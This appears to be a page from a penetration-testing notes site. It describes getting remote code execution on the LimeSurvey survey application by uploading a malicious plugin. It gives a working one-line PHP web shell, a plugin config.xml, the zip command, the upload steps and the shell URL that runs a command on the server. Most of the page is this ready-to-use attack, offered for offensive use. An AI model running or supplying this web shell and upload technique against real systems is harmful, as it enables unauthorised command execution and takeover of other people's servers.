LimeSurvey

Open source online statistical survey web app written in PHP using a MySQL, SQLite, PostgreSQL or MSSQL database

Enumeration

Configuration file

application/config/config.php

RCE via malicious plugin

In the settings menu, there’s a Plugins option

At the plugins page there’s an Upload & install button. Clicking it pops a form asking for a Zip file

Write a PHP shell

<?php system($_REQUEST['cmd']); ?>

Create the configuration file required

<?xml version="1.0" encoding="UTF-8"?>
<config>
    <metadata>
        <name>ExampleSettings</name>
        <type>plugin</type>
        <creationDate>2014-05-27</creationDate>
        <lastUpdate>2024-02-09</lastUpdate>
        <author>Denis Chenu</author>
        <authorUrl>https://www.sondages.pro</authorUrl>
        <version>3.0.0</version>
        <license>GNU General Public License</license>
        <description><![CDATA[Example plugin showing all settings]]></description>
    </metadata>

    <compatibility>
        <version>3</version>
        <version>4</version>
        <version>5</version>
        <version>6</version>
    </compatibility>

    <updaters disabled="disabled">
    </updaters>
</config>

Zip it all together

zip tokyo.zip tokyo.php config.xml

Upload it and click Install
Plugins are store in /upload/plugins/ExampleSettings/

Visit the URL

/upload/plugins/ExampleSettings/tokyo.php?cmd=id

PreviousImageMagick NextVulnerabilities

Last updated 3 days ago